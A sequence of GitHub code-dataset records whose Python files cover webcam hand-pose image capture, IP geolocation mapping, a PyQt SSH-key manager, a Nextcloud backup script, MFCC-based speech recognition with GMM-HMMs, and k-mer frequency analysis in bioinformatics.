记录以拍摄的照片\n n1 = 0\n cap1 = cv2.VideoCapture(0) # 用于监控摄像头\n # 清空目标目录\n clear_dir(path)\n path = '.\\dataset\\HAND POSE' + '\\\\'\n print(\"start record picture\")\n\n while(True):\n # 当储存文件的数量达到所需的数量时,退出循环\n if n >= pic_number:\n print(\"reach the picture number\")\n print(\"ending the process\")\n time.sleep(1.5)\n break\n \n # 判断循环开始\n if n > n1:\n n1 = n\n print(\"Start record new picture\")\n\n # capture frame-by-frame\n ret, frame = cap1.read()\n # 绘制输入框\n cv2.rectangle(frame, (200, 120),(440, 360), (255, 0, 0),3) # 确定左上点, 右下点的宽,高以及线宽\n # Display the resulting frame\n cv2.imshow('capture', frame)\n \n # press q to quit the while loop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n print(\"exit\")\n time.sleep(1)\n break\n # when the number of photo larger than the setted value\n\n # 键入相应的键盘按键时,从摄像头中保存相应的图片\n if cv2.waitKey(1) & 0xFF == ord('a'):\n n += 1\n cv2.imwrite(path + str(n) + '-a.jpg', frame)\n print('saving image: ' + str(n) + '-a.jpg')\n print(\"n: \", n)\n print()\n continue\n \n if cv2.waitKey(1) & 0xFF == ord('s'):\n n += 1\n cv2.imwrite(path + str(n) + '-s.jpg', frame)\n print('saving image: ' + str(n) + '-s.jpg')\n print(\"n: \", n)\n print()\n continue\n\n if cv2.waitKey(1) & 0xFF == ord('d'):\n n += 1\n cv2.imwrite(path + str(n) + '-d.jpg', frame)\n print('saving image: ' + str(n) + '-d.jpg')\n print(\"n: \", n)\n print()\n continue\n\n if cv2.waitKey(1) & 0xFF == ord('w'):\n n += 1\n cv2.imwrite(path + str(n) + '-w.jpg', frame)\n print('saving image: ' + str(n) + '-d.jpg')\n print(\"n: \", n)\n print()\n continue\n\n if cv2.waitKey(1) & 0xFF == ord('o'):\n n += 1\n cv2.imwrite(path + str(n) + '-o.jpg', frame)\n print('saving image: ' + str(n) + '-o.jpg')\n print(\"n: \", n)\n print()\n continue \n \n cap1.release()\n cv2.destroyAllWindows()\n print(\"The final picture number: \", n)\n print(\" \")\n time.sleep(1)\n \n# 图片前处理, 同时读取出每张图片的标签并储存\n# 获取图像ROI,尺寸初设为240*240,在进行进一步缩小至120*120\n# 对图片重命名,同时将图片编号与label保存并导出到csv文件中\ndef pic_preprocess(path='.\\dataset\\HAND POSE'):\n files = os.listdir(path) # 得到文件夹下所有文件的名称\n # 若无照片文件存在\n if len(files) == 0:\n print(\"no picture exists\")\n return 0\n else:\n print(\"start the picture preprocessing in \" + path)\n time.sleep(1)\n label = []\n column_name = ['label_id','pic_label']\n\n for fi in files:\n if (re.match('.*?\\.(\\w+)', fi).group(1)) == 'jpg':\n print(\"treating \" + fi)\n # 分割文件文件名,并将其储存到label_id和label_set中\n var = re.match('(\\d+)-(a|s|d|w|o).jpg', fi)\n label.append([int(var.group(1)), var.group(2)])\n\n # 对图片进行尺寸处理\n current_file = path + '\\\\' + fi\n img = cv2.imread(current_file)\n if img.size >= 100000: # 确认图片是否在处理前或处理后\n print(\"Before treatment: \", img.shape, img.size, img.dtype) # 获取图像属性 \n img = img[120:360, 200:440] # 获取图像ROI\n img = cv2.resize(img, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_LINEAR) # 图像缩放,采用设置缩放因子的形式\n print(\"After treatment: \", img.shape, img.size, img.dtype)\n cv2.imwrite(current_file, img)\n\n # 单张照片处理结束\n print(\"finish treating \" + fi)\n print()\n else:\n # 跳过\n print(\"skip \" + fi)\n print()\n\n # break # 用于调试\n\n # 存入到labels中并导出为csv文件\n labels = pd.DataFrame(data=label, columns=column_name)\n labels = labels.sort_values(by = 'label_id', ascending=True)\n # print(labels)\n labels.to_csv(path + '\\\\' + 'labels.csv', encoding='gbk')\n return labels\n\n# 收集得到的图片进行重命名\ndef try_rename(path='.\\dataset\\HAND POSE'):\n files = os.listdir(path) # 得到文件夹下所有文件的名称\n # 若无照片文件存在\n if len(files) == 0:\n print(\"no picture exists\")\n return 0\n else:\n print(\"rename all pic files\")\n time.sleep(0.5)\n for fi in files:\n if (re.match('.*?\\.(\\w+)', fi).group(1)) == 'jpg':\n var = re.match('(\\d+)-(a|s|d|w|o).jpg', fi)\n os.rename(path+ '\\\\' +fi, path+ '\\\\' +var.group(1) + '.jpg')\n\n\n# get_pic主程序\ndef pic_main(number=100):\n control_camera(pic_number=number)\n print(\"picture capture finish.\")\n print()\n time.sleep(0.5)\n pic_preprocess()\n print(\"picture preprocess finish.\")\n print()\n time.sleep(0.5)\n try_rename()\n print(\"picture rename finish.\")\n print()\n time.sleep(0.5)\n\nif __name__ == \"__main__\":\n n = 50\n # control_camera(pic_number=n)\n # pic_preprocess()\n # try_rename()\n pic_main(number=n)\n\n\n'''\n # opencv库基本摄像头操作\n cap = cv2.VideoCapture(0) # 创建摄像头对象\n print(type(cap))\n # 逐帧显示视频播放\n while(True):\n # 利用read()函数读取视频的某帧\n ret, frame = cap.read()\n # 展示\n cv2.imshow('capture', frame)\n # 若检测到键盘键入q,则退出\n if cv2.waitKey(1) & 0xFF == ord('q'):\n # 释放摄像头对象和窗口\n cap.release()\n cv2.destroyAllWindows()\n break\n'''","repo_name":"Alexnll/Hand-Pose-Estimation","sub_path":"get_pic.py","file_name":"get_pic.py","file_ext":"py","file_size_in_byte":7207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12850707045","text":"import geocoder\nimport folium\n\n# معرفة الاشخاص عن طريق الخريطة \n\n\n# هذا الكود عبارة متغير + عنوان الايبي الخاص بي \nour_ip = geocoder.ip(\"me\")\n\n#متغير يسمي الموقع ثم اعطيه الايبي \nlocation = our_ip.latlng\n\n# متغير الخريطة ثم اعطيه الموقع + حجم التكبير \nour_map = folium.Map(location=location, zoom_start=10)\n\n#هذا الكود يضع الموقع علي الخريطة \nfolium.Marker(location).add_to(our_map)\n\n# هذا الكود يضع بيانات الخريطة في صفحة بمتداد اتش تي ام ايل\nour_map.save(\"map.html\")\n\n#هنا نطبع الموقع \nprint(location)","repo_name":"waleed-nemer/python-socket","sub_path":"معرفة مكان اي شخص علي الخريطة/client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"ar","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39289985298","text":"from PyQt5 import QtWidgets, uic\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QIcon\nimport sys\n\nfrom PyQt5.QtWidgets import QTableWidgetItem\n\nfrom cloud_management import get_user_ssh, delete_ssh\n\nsshlist = {'Name': 'name', 'Public Key': 'public_key', 'Cloud': 'cloud_name', 'id': 'id', 'Cloud id': 'cloud_id'}\n\n\nclass ShowSSHUi(QtWidgets.QMainWindow):\n def __init__(self, user_id: int = None):\n super(ShowSSHUi, self).__init__() # Call the inherited classes __init__ method\n uic.loadUi('show_ssh.ui', self) # Load the .ui file\n self.user_id = user_id\n self.back = self.findChild(QtWidgets.QPushButton, 'bt_back')\n self.back.clicked.connect(self.backButtonPressed)\n\n self.edit = self.findChild(QtWidgets.QPushButton, 'edit')\n self.edit.clicked.connect(self.update_buttonPressed)\n\n self.create = self.findChild(QtWidgets.QPushButton, 'create')\n self.create.clicked.connect(self.createButtonPressed)\n\n self.delete = self.findChild(QtWidgets.QPushButton, 'delete_2')\n self.delete.clicked.connect(self.deleteButtonPressed)\n # todo maryam action titlesh pak nashode\n self.ssh_list = self.findChild(QtWidgets.QTableWidget, 'tableWidget')\n self.ssh_list.setColumnHidden(3, True) # column 3 is cloud id\n self.ssh_list.setColumnHidden(4, True) # column 4 is id\n self.create_table()\n\n def create_table(self):\n sshs = get_user_ssh(user_id=self.user_id)\n self.ssh_list.setRowCount(len(sshs))\n count = 0\n for ssh in sshs:\n for key, value in ssh.items():\n headercount = self.ssh_list.columnCount()\n m = key\n for x in range(0, headercount, 1):\n headertext = self.ssh_list.horizontalHeaderItem(x).text()\n if m == sshlist[headertext]:\n self.tableWidget.setItem(count, x, QTableWidgetItem(str(value)))\n count += 1\n\n def update_buttonPressed(self):\n row = self.ssh_list.currentItem().row()\n from ui.ssh_make import MakeSSHUi\n self.OtherWindow = MakeSSHUi(user_id=self.user_id,ssh_id=int(self.ssh_list.item(row, 4).text()))\n self.OtherWindow.show()\n self.close()\n\n def createButtonPressed(self):\n from ui.ssh_make import MakeSSHUi\n self.OtherWindow = MakeSSHUi(user_id=self.user_id)\n self.OtherWindow.show()\n self.close()\n\n def deleteButtonPressed(self):\n row = self.ssh_list.currentItem().row()\n delete_ssh(int(self.ssh_list.item(row, 4).text()))\n self.create_table()\n\n # todo if press back button back to dashboard\n def backButtonPressed(self):\n # if id=admin ->show all SSHs\n # from admin_dashboard import AdminDashboardUi\n # self.OtherWindow = AdminDashboardUi()\n # self.OtherWindow.show()\n # self.close()\n\n # if id=customer -> show just SSHs of customer\n from ui.dashboard import DashboardUi\n self.OtherWindow = DashboardUi(user_id=self.user_id)\n self.OtherWindow.show()\n self.close()\n\n\n def get_value(object):\n if isinstance(object, QtWidgets.QComboBox):\n value = object.itemData(object.currentIndex())\n if isinstance(object, QtWidgets.QTextEdit):\n value = object.toPlainText()\n if isinstance(object, QtWidgets.QTextBrowser):\n value = object.toPlainText()\n if isinstance(object, QtWidgets.QLabel):\n value = object.text()\n if isinstance(object, QtWidgets.QSpinBox):\n value = object.value()\n if isinstance(object, QtWidgets.QDoubleSpinBox):\n value = object.value()\n return value\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv) # Create an instance of QtWidgets.QApplication\n window = ShowSSHUi(19) # Create an instance of our class\n window.show()\n sys.exit(app.exec_()) # Start the application\n\n\nif __name__ == \"__main__\":\n main()\n# todo maryam oon id ro hide kon actiono bardar\n# todo maryam safeyehaye manage ro pak kon kolan\n","repo_name":"vidagharavian/cloud_service","sub_path":"ui/show_ssh.py","file_name":"show_ssh.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33433532497","text":"from deployments import BasicRsyncBackup, client\nfrom deployments import user_config\nfrom os.path import dirname, abspath, join\nfrom datetime import datetime\nfrom sys import argv\n\n\nclass BackupNextcloud(BasicRsyncBackup):\n \"\"\"Backup the database and files for the nextcloud service.\"\"\"\n\n backup_dir = \"/backup/nextcloud\"\n source_dir = join(dirname(abspath(__file__)), \"mounts\", \"webroot\")\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize variables that are dynamic.\"\"\"\n super().__init__(*args, **kwargs)\n self.now = int(datetime.now().strftime(r\"%s\"))\n self.stage = join(self.backup_dir, \"staging\", str(self.now))\n self.container = client.containers.list(\n filters={'name': 'nextcloud_database_1'}\n )[0] # throws an exception if the container isn't running.\n\n def do_backup(self, *args, **kwargs):\n \"\"\"Override to add extra steps.\"\"\"\n self.prep_folder(self.backup_dir)\n self.prep_folder(self.stage)\n self.backup_database()\n super().do_backup(*args, **kwargs)\n\n def backup_database(self):\n \"\"\"Get a dump from the database and store it in the staging area.\"\"\"\n dump_result = self.container.exec_run(\n \"mysqldump -u nextcloud --password='%s' nextcloud\"\n % user_config['database']\n )\n if dump_result.exit_code:\n raise ValueError(\n \"The mysqldump command returned %d. The command output:\\n%s\"\n % (int(dump_result.exit_code), dump_result.output)\n )\n with open(join(self.stage, \"database.dump\"), 'w') as dumpfile:\n dumpfile.write(dump_result.output.decode())\n\n\ndef main():\n \"\"\"The main entrypoint of the backup script if it's run alone.\"\"\"\n if \"--no-cronjob\" in argv:\n # setup cron job\n freq = False\n else:\n if '--freq=hourly' in argv:\n freq = 'hourly'\n if '--freq=weekly' in argv:\n freq = 'weekly'\n if '--freq=monthly' in argv:\n freq = 'monthly'\n else:\n freq = 'daily'\n backup = BackupNextcloud(freq, abspath(__file__))\n backup.do_backup()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dscottboggs/Deployments","sub_path":"deployments/nextcloud/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71471417768","text":"import numpy as np\r\nfrom scipy.fftpack import dct\r\nimport scipy.io.wavfile\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport hashlib\r\nimport re\r\nfrom hmmlearn import hmm\r\nimport pickle\r\nimport math\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import ConfusionMatrixDisplay\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\nfrom prettytable import PrettyTable\r\nfrom prettytable import PLAIN_COLUMNS\r\ndef get_features(file_path, pre_emphasis = 0.95, frame_size = 0.025, frame_step = 0.01, NFFT = 512,\\\r\n nfilt = 26, low_freq_hz = 300, num_ceps = 13): \r\n \"\"\"\r\n Args:\r\n file_path: File path of the data sample.\r\n pre_emphasis: filter coefficient for pre emphasis phase.\r\n frame_size: size of the frames in framing phase.\r\n frame_step: size of the overlap in framing phase.\r\n NFFT: point numbers of discrete Fourier Transform (DFT).\r\n nfilt: number of filters used in filter Banks calulation phase.\r\n low_freq_hz: lower frequency used in filter Banks calulation phase.\r\n num_ceps: number of Cepstral Coefficients. \r\n\r\n Returns:\r\n numpy array, of features: MFFCCs and delta coefficients.\r\n \"\"\"\r\n sample_rate, signal = scipy.io.wavfile.read(file_path)\r\n #sample_rate = 16000 \r\n \r\n #Preemphasis\r\n signal = np.append(signal[0], signal[1:] - pre_emphasis * signal[: -1])\r\n #plotSignal(time, signal)\r\n\r\n #Framing\r\n signal_length = len(signal)\r\n frame_length = int(frame_size * sample_rate)\r\n step_length = int(frame_step * sample_rate)\r\n\r\n\r\n num_frames = int(np.ceil(float(np.abs(signal_length-frame_length))/step_length))+1\r\n \r\n pad_signal_length = (frame_length + num_frames * step_length) - signal_length\r\n pad_signal = np.zeros(pad_signal_length)\r\n signal = np.append(signal,pad_signal)\r\n\r\n indices_matrix = np.tile(np.arange(0,frame_length),(num_frames,1))\r\n offset_indices = np.arange(0,step_length*num_frames,step_length)\r\n indices_matrix = (indices_matrix[0:].T + (offset_indices[0:])).T\r\n frames = signal[indices_matrix.astype(np.int32, copy=False)]\r\n\r\n #Windowing\r\n #Explicit implementation:\r\n #w = np.arange(0,frame_length)\r\n #w = 0.54 - 0.46 * np.cos((2 * np.pi * w) / (frame_length - 1))\r\n #frames*=w\r\n \r\n frames *= np.hamming(frame_length)\r\n \r\n \r\n #Discrete Fourier Transformation\r\n magnitude_frames = np.absolute(np.fft.rfft(frames, NFFT))\r\n \r\n #Power spectrum\r\n pow_frames = (magnitude_frames ** 2) / NFFT\r\n \r\n #Compute energy\r\n energy = np.sum(pow_frames, axis = 1)\r\n\r\n #Filter Banks\r\n # nfilt = filters number\r\n # low_freq_hz = 300 usually default is 0 (set to 300 for discard too low frequency,\\\r\n # likely generated from noise)\r\n highfreq = sample_rate / 2\r\n low_freq_mel = (2595 * np.log10(1 + low_freq_hz / 700.)) # Convert Hz to Mel\r\n high_freq_mel = (2595 * np.log10(1 + highfreq / 700.)) # Convert Hz to Mel\r\n\r\n mel_points = np.linspace(low_freq_mel, high_freq_mel, nfilt + 2 ) # Equally spaced in Mel scale\r\n hz_points = (700 * (10** (mel_points / 2595.0) - 1 )) # Convert Mel to Hz\r\n \r\n #hz_points 28 gia tri : 300 -> 8000\r\n bin = np.floor((NFFT + 1) * hz_points / sample_rate) # our points are in Hz, but we use fft bins,\\\r\n # so we have to conver from Hz to fft bin number\r\n # print(bin)\r\n # [ 9. 12. 15. 18. 21. 25. 29. 33. 38. 43. 49. 54. 61. 68.\r\n #75. 84. 93. 102. 113. 124. 136. 150. 164. 180. 196. 215. 235. 256.]\r\n fbank = np.zeros((nfilt, int(np.floor(NFFT / 2 + 1))))\r\n #fbank.size=6682\r\n \r\n for j in range(0,nfilt):\r\n for i in range(int(bin[j]), int(bin[j+1])):\r\n fbank[j,i] = (i - bin[j]) / (bin[j+1]-bin[j])\r\n for i in range(int(bin[j+1]), int(bin[j+2])):\r\n fbank[j,i] = (bin[j+2]-i) / (bin[j+2]-bin[j+1])\r\n \r\n # Plot filterbank if you want \r\n #plotFilterbank(fbank) \r\n # print(pow_frames[0].size)\r\n filter_banks = np.dot(pow_frames, fbank.T)\r\n \r\n filter_banks = np.where(filter_banks == 0, np.finfo(float).eps, filter_banks) # if energy is zero, we get problems with log\r\n \r\n filter_banks = np.log10(filter_banks) # dB\r\n \r\n #Mel Frequency Cepstral Coefficients\r\n mfcc = dct(filter_banks, type=2, axis=1, norm='ortho')[:, 0:(num_ceps)] # Keep 0 to num_ceps-1\r\n \r\n mfcc[:, 0] = np.log(energy + 1e-8) # the zeroth cepstral coefficient is replaced with the log of\\\r\n # the total frame energy\r\n\r\n\r\n cep_lifter = 22\r\n (nframes, ncoeff) = mfcc.shape\r\n n = np.arange(ncoeff)\r\n lift = 1 + (cep_lifter / 2) * np.sin(np.pi * n / cep_lifter)\r\n mfcc *= lift \r\n\r\n #Mean normalization \r\n filter_banks -= (np.mean(filter_banks, axis=0) + 1e-8)\r\n mfcc -= (np.mean(mfcc, axis=0) + 1e-8)\r\n\r\n #Delta compute\r\n N = 2\r\n num_frames = mfcc.shape[0]\r\n \r\n denominator = 2 * sum([n**2 for n in range(1, N+1)])\r\n \r\n delta_feat = np.empty_like(mfcc)\r\n delta_feat2 = np.empty_like(mfcc)\r\n padded = np.pad(mfcc, ((N, N), (0, 0)), mode='edge') # padded version of feature vectors(mfcc) (appending N*2 rows)\r\n # print(mfcc[1])\r\n # print(padded[1])\r\n for t in range(num_frames):\r\n delta_feat[t] = np.dot(np.arange(-N, N+1), padded[t : t+2*N+1]) / denominator # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]\r\n # print(np.arange(-N, N+1)[0 : 5])\r\n #Append mfcc and Delta features\r\n features = np.append(mfcc, delta_feat, axis = 1)\r\n padded = np.pad(delta_feat, ((N, N), (0, 0)), mode='edge')\r\n for t in range(num_frames):\r\n delta_feat2[t] = np.dot(np.arange(-N, N+1), padded[t : t+2*N+1]) / denominator\r\n features = np.append(features, delta_feat2, axis = 1) \r\n # print(features.size)\r\n return features\r\ndef main() :\r\n train_dict_word = {}\r\n test_dict_word = {}\r\n labels_list = []\r\n features_list = []\r\n path_dataset = \"Dataset/features/data_train\"\r\n for root_dir, sub_dir, file in os.walk(path_dataset):\r\n sub_dir[:] = [d for d in sub_dir ]\r\n for txt in file:\r\n if(re.match('.*\\.txt$',txt)):\r\n file_path = (os.path.join(root_dir, txt))\r\n label = os.path.relpath(root_dir, path_dataset)\r\n feature = np.loadtxt(\"Dataset/features/data_train/\"+label+\"/\"+txt,delimiter=', ')\r\n labels_list.append(label)\r\n features_list.append(feature)\r\n \r\n words = np.unique(labels_list)\r\n \"\"\"\r\n Split 85% for training and 15% for test\r\n \"\"\"\r\n training_features = features_list\r\n training_labels = labels_list\r\n labels_list = []\r\n features_list = []\r\n path_dataset = \"Dataset/data/data_set\"\r\n for root_dir, sub_dir, file in os.walk(path_dataset):\r\n sub_dir[:] = [d for d in sub_dir ]\r\n for wave in file:\r\n \r\n if(re.match('.*\\.wav$',wave)):\r\n file_path = (os.path.join(root_dir, wave))\r\n label = os.path.relpath(root_dir, path_dataset)\r\n feature = get_features(file_path)\r\n labels_list.append(label)\r\n features_list.append(feature) \r\n test_features = features_list\r\n test_labels = labels_list \r\n for i in range(len(training_features)):\r\n if training_labels[i] not in train_dict_word:\r\n train_dict_word[training_labels[i]] = []\r\n train_dict_word[training_labels[i]].append(training_features[i])\r\n else:\r\n train_dict_word[training_labels[i]].append(training_features[i]) \r\n for i in range(len(test_features)):\r\n if test_labels[i] not in test_dict_word:\r\n test_dict_word[test_labels[i]] = []\r\n test_dict_word[test_labels[i]].append(test_features[i])\r\n else:\r\n test_dict_word[test_labels[i]].append(test_features[i])\r\n #Train dataset\r\n\r\n GMMHMM_models_word = {} # dict of HMMs (one model for each word into the dataset)\r\n num_states = 3 # States number of HMM\r\n num_mix = 2 # number of mixtures for each hidden state\r\n covariance_type = 'diag' # covariance type\r\n num_iter = 10 # number of max iterations\r\n bakis_level = 2\r\n\r\n start_prob = np.zeros(num_states) # start probability prior\r\n start_prob[0:bakis_level - 1] = 1 / float(1 / (bakis_level - 1))\r\n\r\n trans_mat = np.eye(num_states) # transaction matrix probability prior \r\n for i in range(num_states - (bakis_level - 1)):\r\n for j in range(bakis_level):\r\n trans_mat[i, i + j] = 1 / bakis_level\r\n\r\n for i in range((num_states - (bakis_level ) + 1), num_states ):\r\n trans_mat[i,i:] = (1 / (num_states - i))\r\n\r\n\r\n model_number = 0\r\n for word in train_dict_word:\r\n model = hmm.GMMHMM(n_components = num_states, n_mix = num_mix, startprob_prior = start_prob,\\\r\n transmat_prior = trans_mat, covariance_type = covariance_type,\\\r\n n_iter = num_iter, verbose=False)\r\n\r\n train_samples = train_dict_word[word]\r\n length_samples = np.zeros(len(train_samples), dtype=np.int) \r\n for elem in range(len(train_samples)):\r\n length_samples[elem] = train_samples[elem].shape[0]\r\n \r\n train_samples = np.vstack(train_samples) # Stack arrays in train_samples in sequence vertically \r\n\r\n \r\n \r\n \r\n \r\n #model.fit(train_samples, length_samples) # MODEL FIT\r\n model.fit(train_samples)\r\n \r\n GMMHMM_models_word[word] = model\r\n print(\"Finish train model GMM-HMM %s\" % model_number)\r\n model_number += 1\r\n num_words = len(train_dict_word)\r\n print(\"Finish train %s GMM-HMMs for %s different words\" % (num_words, num_words))\r\n\r\n\r\n trained_model_word = GMMHMM_models_word\r\n\r\n print(\"\")\r\n\r\n #Test data\r\n\r\n score_count = 0\r\n words_number = 0\r\n y_true = []\r\n y_pred = []\r\n for word in test_dict_word.keys():\r\n test_samples = test_dict_word[word]\r\n for speech_word in test_samples:\r\n words_number += 1\r\n score_models = {}\r\n for word_model in trained_model_word.keys():\r\n model = trained_model_word[word_model]\r\n score = model.score(speech_word)\r\n score_models[word_model] = score\r\n predict_word = max(score_models, key = score_models.get)\r\n print(word, \": \", predict_word)\r\n y_true.append(word)\r\n y_pred.append(predict_word)\r\n if predict_word == word:\r\n score_count += 1\r\n\r\n \r\n accuracy = (100 * score_count / words_number) \r\n print(\"Recognition rate %s\" %(accuracy))\r\n #euclid\r\n score_count = 0\r\n words_number = 0\r\n y_true = []\r\n y_pred = []\r\n for word in test_dict_word.keys():\r\n test_samples = test_dict_word[word]\r\n for test_word in test_samples:\r\n words_number += 1\r\n score_models = {}\r\n for train_model in train_dict_word.keys():\r\n feature_train = train_dict_word[train_model]\r\n #print(feature_train[0][0][0])\r\n dem = 0\r\n score = 0;\r\n for sample in feature_train :\r\n total = 0\r\n for i in range(len(sample)):\r\n euclid = 0\r\n for j in range(39):\r\n euclid= euclid + (test_word[i][j]-sample[i][j])**2\r\n euclid = math.sqrt(euclid)\r\n total = total + euclid\r\n score = score+total \r\n \r\n # print(score)\r\n #10/99/24\r\n score_models[train_model] = score\r\n predict_word = min(score_models, key = score_models.get)\r\n print(word, \": \", predict_word)\r\n y_true.append(word)\r\n y_pred.append(predict_word)\r\n if predict_word == word:\r\n score_count += 1\r\n\r\n \r\n accuracy = (100 * score_count / words_number) \r\n print(\"Recognition rate %s\" %(accuracy))\r\n \r\n\r\nmain()","repo_name":"xuanthuan0502/recognize_speech","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":12365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14194367428","text":"\n\nfrom collections import defaultdict\nfrom itertools import combinations, product\n\n\ndef reverse_complement_dna(dna):\n\t'''Returns the reverse complement of the given DNA strand.'''\n\tintab = \"ATCG\"\n\touttab = \"TAGC\"\n\ttrantab = dna.maketrans(intab,outtab)\n\treverse_complement = dna.translate(trantab)\n\treturn reverse_complement[::-1]\n\n\ndef ImmediateNeighbors(Pattern):\n\tNeighborhood = list()\n\tNeighborhood.append(Pattern)\n\tnucleotides = [\"A\",\"C\",\"G\",\"T\"]\n\tfor i in range(0,len(Pattern)):\n\t\tsymbol = Pattern[i]\n\t\tfor nucleotide in nucleotides:\n\t\t\tif symbol != nucleotide:\n\t\t\t\tNeighbor = Pattern[:i] + nucleotide + Pattern[(i+1):]\n\t\t\t\tNeighborhood.append(Neighbor)\n\tprint(Neighborhood)\n\treturn Neighborhood\n\n\ndef IterativeNeighbors(Pattern, d):\n\tNeighborhood = list()\n\tNeighborhood.append(Pattern)\n\tfor j in range(0,d):\n\t\tfor String in Neighborhood:\n\t\t\tNeighborhood = Neighborhood + ImmediateNeighbors(Pattern)\n\tprint(Neighborhood)\n\treturn Neighborhood\n\n\ndef kmer_mismatches(kmer, d):\n \"\"\"Returns all k-mers that are within d mismatches of the given k-mer.\"\"\"\n mismatches = [kmer] # Initialize mismatches with the k-mer itself (i.e. d=0).\n alt_bases = {'A':'CGT', 'C':'AGT', 'G':'ACT', 'T':'ACG'}\n for dist in range(1, d+1):\n for change_indices in combinations(range(0,len(kmer)), dist):\n for substitutions in product(*[alt_bases[kmer[i]] for i in change_indices]):\n new_mistmatch = list(kmer)\n for idx, sub in zip(change_indices, substitutions):\n new_mistmatch[idx] = sub\n mismatches.append(''.join(new_mistmatch))\n return mismatches\n\ndef FrequentWords_with_mm_and_rc(string,k,d):\n\t\"\"\"Returns all most frequent k-mers with up to d mismatches in the dna sequence seq.\"\"\"\n\t# Frequency analysis so we don't generate mismatches for the same k-mer more than once.\n\tfreqMap = defaultdict(int)\n\tfor i in range(0,((len(string)-k)+1)):\n\t\tfreqMap[string[i:i+k]] += 1\n\t\tfreqMap[reverse_complement_dna(string[i:k+i])] += 1\n\n\tmismatch_count = defaultdict(int)\n\tfor pattern, freq in freqMap.items():\n\t\tfor mismatch in IterativeNeighbors(pattern,d):\n\t\t\tmismatch_count[mismatch] += freq\n\n\tm = max(mismatch_count.values())\n\tfrequent_patterns = sorted([pattern for pattern, count in mismatch_count.items() if count == m])\n\treturn frequent_patterns\n\n\nwith open(\"input_3.txt\") as file:\n\tdata = file.readlines()\n\tstring = data[0].strip()\n\tnumbers = data[1].strip().split(\" \")\n\n\nprint(numbers)\nprint(string)\n\nPatterns = FrequentWords_with_mm_and_rc(string,int(numbers[0]),int(numbers[1]))\nprint(*Patterns,sep=\" \")","repo_name":"neuwirtt/Bioinformatics_I","sub_path":"FrequentWordsMismatchesReverseComplement.py","file_name":"FrequentWordsMismatchesReverseComplement.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8643401786","text":"from functools import reduce\nimport te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\nfrom te import platform as cceconf\n\n\n# pylint: disable=locally-disabled,too-many-arguments,too-many-locals\ndef _shape_check(shape_x1, shape_x2, shape_tgt):\n # check whether the shape meets the broadcast requirements, and output broadcast shape\n try:\n _, _, x_shape = util.produce_shapes(shape_x1, shape_x2)\n except RuntimeError:\n raise RuntimeError(\"x1 and x2 can't be broadcast\")\n\n x_shape_reduce = x_shape[:]\n x_shape_reduce.pop(1)\n try:\n _, _, tgt_shape = util.produce_shapes(x_shape_reduce, shape_tgt)\n except RuntimeError:\n raise RuntimeError(\"x and target can't be broadcast\")\n min_dim = min(len(shape_x1), len(shape_x2), len(shape_tgt))\n if min_dim >= 3:\n reduce_dim = -1\n for i in range(-1, -min_dim, -1):\n if(shape_x1[i] == shape_x2) or (\n shape_x1[i] == shape_tgt[i]):\n reduce_dim = i\n else:\n break\n if reduce_dim != -1:\n shape_x1 = list(shape_x1[:reduce_dim]) + [\n reduce(lambda x, y:x*y, shape_x1[reduce_dim:])]\n shape_x2 = list(shape_x2[:reduce_dim]) + [\n reduce(lambda x, y:x*y, shape_x2[reduce_dim:])]\n shape_tgt = list(shape_tgt[:reduce_dim]) + [\n reduce(lambda x, y:x*y, shape_tgt[reduce_dim:])]\n x_shape = list(x_shape[:reduce_dim]) + [\n reduce(lambda x, y:x*y, x_shape[reduce_dim:])]\n tgt_shape = list(tgt_shape[:reduce_dim]) + [\n reduce(lambda x, y:x*y, tgt_shape[reduce_dim:])]\n util.check_shape_rule(shape_x1)\n util.check_shape_rule(shape_x2)\n util.check_shape_rule(shape_tgt)\n util.check_tensor_shape_size(shape_x1)\n util.check_tensor_shape_size(shape_x2)\n util.check_tensor_shape_size(shape_tgt)\n\n return x_shape, tgt_shape, shape_x1, shape_x2, shape_tgt\n\n\ndef _dtype_check(input_dtype_x1, input_dtype_x2, target_dtype, reduction):\n # cast_to not support \"int16\", \"int64\", ISA not support float64(double)\n x_check_list = [\"int8\", \"uint8\", \"int32\", \"float16\", \"float32\"]\n if not input_dtype_x1 in x_check_list:\n raise RuntimeError(\"x1 dtype %s not support\" % input_dtype_x1)\n if not input_dtype_x2 in x_check_list:\n raise RuntimeError(\"x2 dtype %s not support\" % input_dtype_x2)\n\n # cast_to not support \"int16\", \"int64\", \"uint8\" can't indicate -1\n tgt_check_list = [\"int8\", \"int32\", \"float16\", \"float32\"]\n if not target_dtype in tgt_check_list:\n raise RuntimeError(\"target dtype %s not support\" % target_dtype)\n\n reduce_check_list = ['mean', 'sum', 'none']\n if reduction not in reduce_check_list:\n raise RuntimeError(\"reduction method not support\")\n\n\n# pylint: disable=locally-disabled,unused-argument,invalid-name\n@fusion_manager.register(\"cosine_embedding_loss\")\ndef cosine_embedding_loss_compute(x1, x2, target, output_y, x_shape_broadcat,\n tgt_shape_broadcast, margin=0,\n reduction='mean',\n kernel_name=\"cosine_embedding_loss\"):\n \"\"\"\n DSL description of the 